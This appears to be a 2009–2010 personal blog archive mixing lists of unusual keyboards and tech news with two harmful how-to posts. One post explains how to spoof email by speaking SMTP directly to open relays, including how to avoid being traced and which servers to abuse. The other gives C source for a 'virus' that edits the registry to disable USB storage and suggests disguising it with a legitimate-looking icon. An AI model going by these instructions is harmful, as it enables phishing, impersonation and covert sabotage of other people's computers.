Thursday, February 25, 2010

COOLEST KEYBOARDS

Aren't you bored with your old keyboard.Well i'm so much bored wish i could use the following keyboards they are different.


 Optimus Maximus


Optimus Maximus 1
Optimus Maximus 2

Every key of the Optimus Maximus keyboard is a stand-alone display showing the function it is currently associated with. Optimus is equally good for any keyboard layouts�Cyrillic, Ancient Greek, Georgian, Arabic, Quenya, hiragana�and so on to infinity: notes, numerals, special symbols, HTML codes, math functions, images etc.
The service life of displays and their ribbon cables has been enhanced by making the screens embedded in the keytops motionless�it�s only the transparent caps that are pressed. Every button on the keyboard (or, more precisely, a module with a moving cap, a microchip and a display) is easy to remove in order to clean or replace.
Website: artlebedev.com artlebedev.com

New Standard Keyboards ABC


New Standard Keyboards ABC

The alphabetical layout offers easy learning for touch typists, and user-friendliness for instant typing by beginners. The patented letter arrangement also produces smooth, efficient, finger movements for high-speed touch typing. Just 53 ergonomically arranged keys provide all the functions of ordinary keyboards. Aligned with natural finger movements for improved posture, they are in easy reach from home position. Integrated keypad allows the mouse to be closerto the keyboard. For low desks, a unique backward-slope setting keeps wrists straight and relaxed. Only 12.5� long, it is lightweight, portable, USB, and needs no driver.
Website: newstandardkeyboards.com newstandardkeyboards.com

 Goldtouch Adjustable Keyboard

Goldtouch Adjustable Keyboard

The Adjustable Ergonomic Keyboard allows you to adjust the two alphanumeric sections both horizontally and vertically to suit your individual body requirements. This helps you assume a more natural posture that is conducive to improving comfort and productivity while using your computer.
Website: keyovation.com keyovation.com

 Wolf King Warrior


Wolf King Warrior

The Wolf King warrior is the ultimate weapon for the gamer on the go. Its compact size makes it perfect for LAN Parties. The patented Timber Wolf gaming area design has been expanded by including an additional 15 keys for a total of 55 ergonomically placed controls commonly used in FPS games. Speed, control and communication is critical in making the moves and decisions that can make the difference between life & death, victory or defeat. The warrior gives you the advantage over your counterparts who use obsolete technology. Its "one palm size fits all keys" concept will make your movement more precise and deadly to your opponents. Be the Leader Of the Pack with the Weapon Of Champions.
Website: wolfkingusa.com wolfkingusa.com


 Dvorak Simplified Keyboard

Dvorak Simplified Keyboard

The Dvorak layout was designed to address the problems of inefficiency and fatigue which characterized the QWERTY keyboard layout. The QWERTY layout was introduced in the 1860s, being used on the first commercially-successful typewriter. The QWERTY layout was designed so that successive keystrokes would alternate between sides of the keyboard so as to avoid jams. Some sources also claim that the QWERTY layout was designed to slow down typing speed to further reduce jamming.
More information: wikipedia.com wikipedia.com

Keyboards come in many shapes – from the simplest computer grey $9.99 standard 102-key keyboard to variants that seem to come straight out of a Star Trek episode. Here’s our Top 10 list of the weirdest keyboards ever.

Roll-up keyboard
The roll-up keyboard

This keyboard has the same measurements as a standard 102-key keyboard, but there’s a big difference. You can roll this one up and put it in your pocket. Nice.
Roll-up keyboard [Thinkgeek.com]
 The wrist keyboard
The wrist keyboard
This one might be useful if you’re in the need to type stuff while doing practical work in tough climates – but if you would wear this keyboard at the office, you might be considered a bit geeky.
The wrist keyboard [l3sys.com]
Maltron 3D Ergonomic Keyboard
Maltron 3D Ergonomic Keyboard
Things are starting to get a bit more weird, ey? Getting used to this keyboard isn’t something you’ll do in 10 minutes or so – it will take a while for sure. But if you have medical problems with your hands, this might be a good choice since it’s a very ergonomic keyboard. It looks very weird though!
The SafeType keyboard
The SafeType keyboard
Just take a look at this one. Do you understand how to use it? The idea is that your hands and arms shall be in a more relaxed position while working with the SafeType compared to a traditional keyboard. While doing research for this article I ran acrossthis review of the safetype:
However, if you have a low tolerance for frustration (and learning to type in a new manner can be frustrating) then your best bet is to stay flat and stick with a keyboard that’s a little more “common”.
SafeType [store.yahoo.com]
Virtual Laser Keyboard
Virtual Laser Keyboard
Wow, it’s heating up, don’t you agree? This is more cool than weird though. This laser gadget projects a virtual keyboard on a table or other suitable material, and then interpret your finger movement and pass them on to your PDA or whatever you have it connected to. Cool.
Virtual Laser Keyboard [virtual-laser-keyboard.com]
The frogpad
The frogpad
The frogpad is a tiny, tiny keyboard – or it would be more suitable to call it a keypad actually. The manufacturer say that you can get up to 40 words per minute if you practice between 6 to 10 hours with it. Any idea why they are calling it a frogpad?
Frogpad [frogpad.com]
The Twiddler 2
The Twiddler 2
What do you say about the Twiddler 2? It looks to be quite painful to use, or what do you think? According to the testimonials at their site, it will take you ‘a weekend’ to learn typing 30 words per minute, so the frogpad wins that round. The Twiddler actually reminds me of those guitar classes I took when I was a young boy…
The Twiddler 2 [handykey.com]
The Orbitouch
The Orbitouch
This one could be a leftover from Area 51, or a prop from the set of any science fiction movie. Wonder how it works? Here’s what the manufacturer say: “The orbiTouch creates a keystroke when you slide the two domes into one of their eight respective positions. You type the different characters by sliding the domes to create letters and numbers. The orbiTouch also has an integrated mouse, so moving the domes gives you full mouse and keyboard capability!”
The target group for this keyboard is of course people who have limited or no motion in their fingers or hands, and that’s a very good thing – but anyway, it’s a weird keyboard.
 The Datahand
The Datahand
This product is aimed for people who get pain in their hands from typing with a traditional keyboard – and that’s a good thing. It’s still looks like a very strange keyboard. Everytime I see this one I think of the movie Predator with Arnold Schwarzenegger, don’t know why. I love this one – the keyboard, not the movie.
The datahand [Datahand.com]
The Tidy Tippist
The Tidy Tippist

Isn’t this one lovely? The keyboard is hidden inside a decorative, washable tablecloth.The electronic is woven into a fabric, which finds itself between layers of water resistant felt as sandwich material. The soft felt surface makes it a pleasure for fingers to tip – a cosy keyboard. Awesome, hehe.
The Tidy Tippist [ToniaWelter.com]
Honorable mention
The ZX Spectrum
ZX Spectrum [Wikipedia]

Tuesday, January 12, 2010

How to send Fake mail on your own?

I am not responsible for anything You are responsible for all your actions.I am just giving here to share the knowledge don't try it on others because you can be tracked down too...

http://www.ku.ac.th/magazine_online/image/spam.gifHow can you send fake mail without using any website to send fake mail.Why can't we send it on our own had your thought of it?I think you had thought of it atleast once.Me too.....
So i searched all over the net and tried it for my self and i mailed it to my email account.I got the mail but it was in spam folder...The technique i am going to show worked a long time ago...But now its not working to send it directly i don't why but the mail will be delivered to the spam folder.Once if they make it as the mail is not spam then they will get mail directly....
Overview SMTP (Simple Mail Transfer Protocol) is the protocol by which Internet mail is sent. SMTP servers use this protocol to communicate with other servers or mail clients. However, by telneting directly to a mail server and manually speaking SMTP, one can easily send mail from any address specified - meaning that mail can be sent from fake addresses while the sender's real address is untraceable. What is Needed? All that you need is a generic telnet client. Local echo should be turned on so you can see what you type. Also, it is important to note that SMTP servers do not handle backspaces, so you must type everything correctly. How do I Start? Telnet to port 25 of your target SMTP server (more on SMTP servers selection below). The server should respond with a generic welcome message. You will type HELO domain.name. Use any domain name you wish as most servers do not check the name against the IP you are telneting from. Type MAIL FROM: . This is where the message will appear to be from. Next, type RCPT TO: . This specifies who will receive the message. Type DATA and type the body of your message. To send the message, enter a line with only a period. Type QUIT to disconnect. Sample Session 220 hq.af.mil Sendmail 4.1/Mork-1.0 ready at Thu, 14 Mar 96 00:26:46 EST HELO prometheus.com 250 hq.af.mil Hello prometheus.com (prometheus.com), pleased to meet you MAIL FROM: 250 ... Sender ok RCPT TO: 250 ... Recipient ok DATA 354 Enter mail, end with "." on a line by itself This is the body of my message. . 250 Mail accepted QUIT 221 hq.af.mil delivering mail What about message subjects? The subject, date, to, etc. are part of the DATA area. After the DATA command, start with date and continue is the fashion illustrated by the example code below. Make sure there are no mistakes, because the first mistake will cause the data to appear in the body of the message, not header. It is interesting, because these fields take precedence over the MAIL FROM: and RCPT TO: when displaying. A message can be routed to a person even though the message itself appears to be addressed to someone else. The key is to type VERY carefully. Example: DATA Date: 23 Oct 81 11:22:33 From: SMTP@HOSTY.ARPA To: JOE@HOSTW.ARPA Subject: Mail System Problem Sorry JOE, your message to SAM@HOSTZ.ARPA lost. HOSTZ.ARPA said this: . End Example Can my mail be traced? Yes, the IP address you mailed from can be traced if you are not careful. All mail will show a line in the header listing the IP address that you originally telneted from. If the person you are sending mail to doesn't know much about IP's and the like, you shouldn't worry too much. Furthermore, depending on your the nature of your connection, there are different implications. For instance, if you have a direct connection, you can be easily traced by your IP address. On the other hand, if you have a dial-in connection or service such as AOL, you will not have a defined IP address. You will be assigned a temporary one. The only way your mail can be traced with this type of connection is to check against the dial in service's system logs. The take-home message is that you are safe with this type of connection unless you do something really stupid. Finally, the best case scenario is a public access terminal with no logging. This type connection is untraceable. Author's Note: I have found some servers that don't log IP. Read No IP SMTP Server What SMTP servers can I use? An easy (but hit-or-miss) way to find random SMTP servers is to look at web addresses on Yahoo! or another search engine. Universities and government agencies are always good choices. Find a URL and telnet to port 25. If you get a response, you have located an available server. 95% of servers will accept your mail. The others will not allow external mail forwarding for security reasons. Always test the server first. OR Check Hunter's List of Usable SMTP Servers. All servers on this list have been tested and will work. A hyptertext interface makes it easy to use the servers.

Thursday, November 26, 2009

Google herds coders into Chrome extensions gallery

Google is corralling developers into uploading their Chrome browser extensions to a new gallery that hasn’t been opened up to testers yet.
That will change for a select bunch of coding guinea pigs in the next few days, said Mountain View.
In the meantime, those developers who want to slot their add-ons into Chrome will be required to sign up to Google’s Ts&Cs before uploading their extensions into the gallery.
Under those terms, Google has the power to examine a developer’s extension before it gets published.
Chrome extensions Limited beta release
“For most extensions, the review process is fully automated,” wrote Google software engineer Lei Zheng on firm’s Chromium blog yesterday.
“The only extensions we'll review manually are those that include an NPAPI component and all content scripts that affect ‘file://’ URLs. For security reasons, developers of these types of extensions will need to provide some additional information before they can post them in the gallery.”
Just last week Mozilla confirmed plans to debut a "lockdown" feature in Firefox 3.6 to force third party application developers to toe the line by preventing them from adding their own code into the browser's components directory. ®

Thursday, November 19, 2009

6 Billion Others

6billion
6 Billion Others: Portraits of Humanity from Around the World 
is a project completed in January 2009 (?), by Yann Arthus Bertrand and is translated into a website and a book. See and interact with faces of people from all over the worldand watch and hear mini biographical excerpts from these people, answering questions like “What does love mean to you?” “What do you hope to teach your children?” “What does happy mean to you?”. It is a project that recognizes the universal life goals, desires and needs of people across the world as well as the cultural differences, opportunities and sometimes heartbreaking challenges that come from individual perspective and living in one place or another.

C Program Without a Main Function

How to write a C program without a main function?.Is it possible to do that.Yes there can be a C program without a main function.Here’s the code of the program without a main function…

#include
#define decode(s,t,u,m,p,e,d) m##s##u##t
#define begin decode(a,n,i,m,a,t,e)
int begin()
{
printf(” hello “);
}
Does the above program run without the main function? Yes, the above program runs perfectly fine even without a main function.But how,whats the logic behind it? How can we have a C program working without main ?
Here we are using preprocessor directive #define with arguments to give an impression that the program runs without main.But in reality it runs with a hidden main function.
The ‘##‘ operator is called the token pasting or token merging operator.That is we can merge two or more characters with it.
NOTE: A Preprocessor is program which processess the source code before compilation.
Look at the 2nd line of program-
#define decode(s,t,u,m,p,e,d) m##s##u##t
What is the preprocessor doing here.The macro decode(s,t,u,m,p,e,d) is being expanded as “msut” (The ## operator merges m,s,u & t into msut).The logic is when you pass (s,t,u,m,p,e,d) as argument it merges the 4th,1st,3rd & the 2nd characters(tokens).
Now look at the third line of the program-
#define begin decode(a,n,i,m,a,t,e)
Here the preprocessor replaces the macro “begin” with the expansion decode(a,n,i,m,a,t,e).According to the macro definition in the previous line the argument must de expanded so that the 4th,1st,3rd & the 2nd characters must be merged.In the argument (a,n,i,m,a,t,e) 4th,1st,3rd & the 2nd characters are ‘m’,'a’,'i’ & ‘n’.
So the third line “int begin” is replaced by “int main” by the preprocessor before the program is passed on for the compiler.That’s it…
The bottom line is there can never exist a C program without a main function.Here we are just playing a gimmick that makes us beleive the program runs without main function, but actually there exista a hidden main function in the program.Here we are using the proprocessor directive to intelligently replace the word begin” by “main” .In simple words int begin=int main.

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.


Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
Virus to disable USB ports1.
//block_usb.c
#include
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}


2.
//unblock_usb.c
#include

void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}




3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post

Wednesday, November 11, 2009

Samsung launches Open Source mobile OSSamsung launches Open Source mobile OS


Bangalore: Samsung has launched its own operating system (OS) for mobile to compete against other open source platform, Symbian and Google Android. The OS is named Bada, which means 'ocean' in Korean, is an open platform that Samsung is hoping will attract both customers and developers to its devices. The company has not released several details about Bada, but said it will have a strong user interface, be developer friendly, and enable mobile operators to offer various content and services, according to InformationWeek.



The company also said it encourages integrating common experiences and functions across applications, which means core functionalities like the dialer, messaging, and address book will be open to developers. Users will also eventually be able to download Bada applications over the air from Samsung's Application Store. "By opening Samsung's mobile platforms we will be able to provide rich mobile experiences on an increasing number of accessible smartphones," said Hosoo Lee, Executive Vice President at Samsung, in a statement.

Samsung is jumping into the already crowded and highly competitive area of mobile platforms and will be competing against Microsoft, Google, Symbian, Apple, Research In Motion, and Palm.

Samsung also said the Bada software development kit will be released in December, and handsets with the OS are expected to arrive in 2010. Samsung has not made it clear whether the company will continue to manufacture smartphones with Android or Windows Mobile once Bada is ready to go.